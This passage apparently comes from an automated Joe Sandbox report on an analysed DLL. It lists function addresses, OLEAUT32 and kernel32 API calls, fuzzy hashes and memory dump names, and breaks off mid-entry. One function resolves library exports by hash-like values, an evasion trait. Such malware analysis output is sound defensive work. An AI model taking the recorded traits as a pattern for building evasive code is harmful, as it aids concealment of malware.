                                                                        • Part of subcall function 6F0C6880: SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C68FD
                                                                        • Part of subcall function 6F0C6880: VariantClear.OLEAUT32(?), ref: 6F0C6909
                                                                        • Part of subcall function 6F0C6880: SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C6923
                                                                        • Part of subcall function 6F0C6880: SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0C6981
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ArraySafe$ClearInit$Element$CreateDestroyVector$CopyException@8Throw_mallocstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 4028882980-0
                                                                      • Opcode ID: 9f45d52e14a8a0b131c1b7481bdc8740abd33d8cebe885078f6514d460b9de3e
                                                                      • Instruction ID: c3734140cae139644318ffe2989e30307934431dc9b5cf3308c49b92d3f03085
                                                                      • Opcode Fuzzy Hash: 9f45d52e14a8a0b131c1b7481bdc8740abd33d8cebe885078f6514d460b9de3e
                                                                      • Instruction Fuzzy Hash: 4CB149725087019FC704CF68C884B5AB7E5FF89764F048A5EF9A597390EB34E905CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C3690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Init$Clear$Copy
                                                                      • String ID:
                                                                      • API String ID: 3833040332-0
                                                                      • Opcode ID: 5e54b945662b5518ccfcce32a17c84d262df0636ff3f6e33d3e6a5d2089e6888
                                                                      • Instruction ID: 8c65cee0e679ef139796b79c183e9c9509b1c45b28c73402df928e0f2e84f54c
                                                                      • Opcode Fuzzy Hash: 5e54b945662b5518ccfcce32a17c84d262df0636ff3f6e33d3e6a5d2089e6888
                                                                      • Instruction Fuzzy Hash: 70817EB1900319AFDB14DFA8C884FEEBBB9FF49304F14455DE905AB241DB35A905CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C4BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C4BDC
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C4BE5
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C4BEB
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0C4BF6
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C4C2A
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4C37
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0C5107
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C5117
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C511D
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C5123
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                      • String ID:
                                                                      • API String ID: 2515392200-0
                                                                      • Opcode ID: 5db73902294a4d17f23431eaa06e3fa8edb6a506a01cada03f46f7cf1c70a3d4
                                                                      • Instruction ID: 2ad0c8793f6ed853bd59d9e987d9c6c38b0727729a177ea7a9cfb038e74bd6e5
                                                                      • Opcode Fuzzy Hash: 5db73902294a4d17f23431eaa06e3fa8edb6a506a01cada03f46f7cf1c70a3d4
                                                                      • Instruction Fuzzy Hash: 5812E475A15705AFC758DB98DD84DAEB3B9BF8C300F144668F50AABB91CA30F841CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C49B0 Relevance: 15.2, APIs: 10, Instructions: 174COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(6F1205A8), ref: 6F0C49EE
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C49F7
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C49FD
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0C4A08
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C4A39
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4A45
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0C4B66
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4B76
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4B7C
                                                                      • VariantClear.OLEAUT32(6F1205A8), ref: 6F0C4B82
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                      • String ID:
                                                                      • API String ID: 2515392200-0
                                                                      • Opcode ID: 21ea06862568c4b93f34c14756539ad6eb35161f918e96cfaca64fc315ea9841
                                                                      • Instruction ID: 7e568b9de4e3cbbcb613118bc104e90c4fc9f8555c6b2bbe4a1677a4aae4863b
                                                                      • Opcode Fuzzy Hash: 21ea06862568c4b93f34c14756539ad6eb35161f918e96cfaca64fc315ea9841
                                                                      • Instruction Fuzzy Hash: 79515C76A04219EFDB04DFA4CC84FEEB7B8FF89310F044169E915AB245DB35A941CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C47D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C480C
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C4815
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C481B
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0C4826
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6F0C485B
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4868
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0C4974
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4984
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C498A
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4990
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                      • String ID:
                                                                      • API String ID: 2515392200-0
                                                                      • Opcode ID: 2dac732cb620d9ffc6ed1ae22f3efa836db61fc3338a4aa966a66949d0ac3ada
                                                                      • Instruction ID: 221466aea892f6450e294ec3316b1812f87cde32265fd163ba96a3d500fd03d7
                                                                      • Opcode Fuzzy Hash: 2dac732cb620d9ffc6ed1ae22f3efa836db61fc3338a4aa966a66949d0ac3ada
                                                                      • Instruction Fuzzy Hash: A7514A76900259AFDB04DFA8CC80EEEB7B9FF89310F14456DE506EB640DB30A905CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BDCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0BDD00
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6F0BDD10
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,6F0C2FFF,?), ref: 6F0BDD47
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BDD4F
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,6F0C2FFF,?), ref: 6F0BDD6D
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6F0BDDA4
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BDDAC
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0BDE16
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0BDE27
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BDE31
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
                                                                      • String ID:
                                                                      • API String ID: 3525949229-0
                                                                      • Opcode ID: 5770306df19c3e9a46e98bdcee19bcf71555daecf42181bd0c3c937921d47879
                                                                      • Instruction ID: 538bda3080b7984e18bce95b6bbeac56d7c1f4066df77ccda5e0c5dca85fc0c3
                                                                      • Opcode Fuzzy Hash: 5770306df19c3e9a46e98bdcee19bcf71555daecf42181bd0c3c937921d47879
                                                                      • Instruction Fuzzy Hash: 63516C75A01609AFDB00DFA4C884FDFBBB9FF99310F008129EA15A7351DB35A941CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BE120 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 364COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6F0BE29B
                                                                      • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6F0BE2B6
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6F0BE2D7
                                                                        • Part of subcall function 6F0C5760: std::tr1::_Xweak.LIBCPMT ref: 6F0C5769
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F0BE309
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0BE523
                                                                      • InterlockedCompareExchange.KERNEL32(6F14C6A4,45524548,4B4F4F4C), ref: 6F0BE544
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                      • String ID: .o$ .o
                                                                      • API String ID: 2722669376-3732043186
                                                                      • Opcode ID: 1a80a02309faf1293e8f4a34cb3f7c698467e9a6867d003fd8abf4831995a6f2
                                                                      • Instruction ID: 6af12771cd756f486e710150f823ecd3e02a2df961d243d0ecab6b464bb5ea17
                                                                      • Opcode Fuzzy Hash: 1a80a02309faf1293e8f4a34cb3f7c698467e9a6867d003fd8abf4831995a6f2
                                                                      • Instruction Fuzzy Hash: 5AD1C1B1A003059FDB10DFA8CC94BAE77F8EF45314F1485ADE905AB281E776E944CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B8470 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 270COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • InitializeCriticalSection.KERNEL32(00000000,00000000,6F0B5D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6F0B84EA
                                                                      • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6F0B84F0
                                                                      • std::exception::exception.LIBCMT ref: 6F0B853C
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0B8551
                                                                      • __cftoe.LIBCMT ref: 6F0B88ED
                                                                        • Part of subcall function 6F10A116: __mbstowcs_s_l.LIBCMT ref: 6F10A12C
                                                                      • __cftoe.LIBCMT ref: 6F0B8911
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalInitializeSection__cftoe$Exception@8Throw__mbstowcs_s_l_mallocstd::exception::exception
                                                                      • String ID: zX$P
                                                                      • API String ID: 689832159-2079734279
                                                                      • Opcode ID: c8c9f0e6c611817e2789ee90291e6370d22c15cea9ae652f65da6d4a4d1d1055
                                                                      • Instruction ID: b72b736874933d624b87f36b22da57553e61e257a9b18d925662e89cea50a454
                                                                      • Opcode Fuzzy Hash: c8c9f0e6c611817e2789ee90291e6370d22c15cea9ae652f65da6d4a4d1d1055
                                                                      • Instruction Fuzzy Hash: DBC147B15087819FC375CF54C880B9BBBF8FB84750F508A1EE5998B280DB71A645CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B12A0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 171COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Xinvalid_argumentstd::_$_memmove
                                                                      • String ID: invalid string position$string too long
                                                                      • API String ID: 2168136238-4289949731
                                                                      • Opcode ID: 755986043fac2ce54026e303a7b1aad6f510aade705a7c869b879677722807c0
                                                                      • Instruction ID: 8115b0afe12732d70aa53c5906862b734c5f7253089aa89598b86a675e27abb2
                                                                      • Opcode Fuzzy Hash: 755986043fac2ce54026e303a7b1aad6f510aade705a7c869b879677722807c0
                                                                      • Instruction Fuzzy Hash: 5941C6313002049BD714DF6CDE90B5EB3E6EB85B54B600A2EF491C7784EB76E8558BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D1B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6F0D1C5E
                                                                      • LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6F0D1C69
                                                                      • GetProcAddress.KERNEL32(00000000,F1F2E532,?,00000000), ref: 6F0D1CA2
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6F0D1CC1
                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6F0D1CCC
                                                                      • GetProcAddress.KERNEL32(00000000,EFF3E52B,?,00000000), ref: 6F0D1D0A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                      • String ID: User32.dll$kernel32.dll
                                                                      • API String ID: 310444273-1965990335
                                                                      • Opcode ID: 084bd52ee01a7e13e7d42c4e138cb3252df9ec513080d7b04d0734d63cadfcbf
                                                                      • Instruction ID: b896fbdb01e8b08c501dcb769d38ee8765d7304fb9d6cf75f11717d192c3c026
                                                                      • Opcode Fuzzy Hash: 084bd52ee01a7e13e7d42c4e138cb3252df9ec513080d7b04d0734d63cadfcbf
                                                                      • Instruction Fuzzy Hash: 57612C78604B009FD724CF58C591B6ABBF2FF46750F608958E4968BA42DB36F856CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F114409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • UnDecorator::getArgumentList.LIBCMT ref: 6F11442E
                                                                        • Part of subcall function 6F113FC9: Replicator::operator[].LIBCMT ref: 6F11404C
                                                                        • Part of subcall function 6F113FC9: DName::operator+=.LIBCMT ref: 6F114054
                                                                      • DName::operator+.LIBCMT ref: 6F114487
                                                                      • DName::DName.LIBCMT ref: 6F1144DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                      • API String ID: 834187326-2211150622
                                                                      • Opcode ID: 11a4930c8f3f96d491a2236ccc03daabd75d24e3c8ca38fa35b5fd92a7d510b0
                                                                      • Instruction ID: 72d12385c6a9976fc6b2bea2f4be854390879e7834d12713fe021a4ddbb676b8
